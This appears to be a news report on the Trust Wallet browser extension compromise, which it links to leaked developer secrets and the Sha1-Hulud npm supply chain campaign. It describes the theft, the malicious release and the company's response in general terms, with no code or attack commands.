Trust Wallet believes the recent compromise of its web browser extension, which led to the theft of roughly $8.5 million from more than 2,500 crypto wallets, is likely connected to the wider “Sha1-Hulud” supply chain attacks that hit the software industry in November.
Trust Wallet, used by over 200 million people worldwide, allows users to store, send, and receive Bitcoin, Ethereum, Solana, and thousands of other cryptocurrencies through a browser extension and mobile apps. The December 24 incident stemmed from a trojanized version of the Trust Wallet Chrome extension.
According to the company, attackers gained access after Trust Wallet’s developer GitHub secrets were exposed. This allowed the threat actor to obtain the browser extension source code and a Chrome Web Store (CWS) API key. With full CWS API access, the attacker bypassed Trust Wallet’s internal approval and manual review process and directly uploaded a malicious build.
The compromised version, released as Trust Wallet extension version 2.68.0, included a malicious JavaScript file that silently collected sensitive wallet data and enabled unauthorized transactions. To support the attack, the threat actor registered the domain metrics-trustwallet[.]com and a related subdomain to host the malicious code referenced by the altered extension.
Trust Wallet said the attacker used legitimate source code obtained via leaked secrets, embedding the malicious functionality without relying on obvious code injection techniques. Because the upload was signed and passed Chrome Web Store checks, it was automatically released to users.
In response, Trust Wallet revoked all release-related APIs to prevent further malicious uploads and worked with the NiceNIC registrar to suspend the attacker-controlled domains, stopping additional data exfiltration.
The company believes this incident is linked to Sha1-Hulud (also known as Shai-Hulud 2.0), a large-scale supply chain attack targeting the npm software registry. The campaign initially emerged in September, when attackers compromised over 180 npm packages using a self-propagating payload to steal developer secrets and API keys.
The Sha1-Hulud campaign later expanded, impacting more than 800 packages and introducing over 27,000 malicious npm packages designed to harvest developer and CI/CD secrets. In total, the campaign exposed approximately 400,000 raw secrets across more than 30,000 GitHub repositories, with a majority of stolen npm tokens still valid as of early December.
